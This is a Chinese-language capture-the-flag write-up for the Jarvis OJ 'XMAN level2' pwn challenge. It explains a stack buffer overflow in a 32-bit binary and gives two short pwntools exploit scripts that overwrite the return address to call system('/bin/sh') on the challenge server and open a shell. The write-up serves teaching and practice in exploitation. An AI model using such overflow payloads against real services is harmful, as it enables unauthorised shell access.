[Jarvis OJ - PWN]——[XMAN]level2

• 題目地址：https://www.jarvisoj.com/challenges
• 題目：
  首先，checksec一下。32位并且沒有開啟PIE
  
  在IDA中查看一下。main函數里面沒有我們想要的，點開vulnerable_function函數。發現read函數，第一個參數為0，代表標準輸入。可以利用棧溢出。
  
  
  發現里面有system函數，但是里面的參數不是我們想要的，所以我們要覆蓋一下它。按shift + F12，找到/bin/sh字符串。
  
  
  /bin/sh的地址為0x0804A024
  下面我們有兩種方法

方法一

可以利用 .plt 找到system函數第一句執行的地址。或者也可以自己找。
exp:

from pwn import * p = remote('pwn2.jarvisoj.com', 9878) elf = ELF("./level2.54931449c557d0551c4fc2a10f4778a1") binsh = 0x0804A024 sys_address = elf.plt["system"] # 其實就是0x08048320 payload = 'a'*(0x88 + 0x4) + p32(sys_address)+'aaaa'+p32(binsh) # aaaa可以隨機四個字符就好 p.send(payload) p.interactive()

方法二

找到call system的地址
exp:

from pwn import * p = remote('pwn2.jarvisoj.com', 9878) binsh = 0x0804A024 call_system_address = 0x0804845C payload = 'a'*(0x88 + 0x4) + p32(call_system_address)+p32(binsh) p.send(payload) p.interactive()

小知識

call語句，其實包含兩個步驟：

將函數的下一條執行語句的地址壓棧 ，也就是返回地址

執行函數的第一個語句

就不給你自己寫下exploit

總結

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level2的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。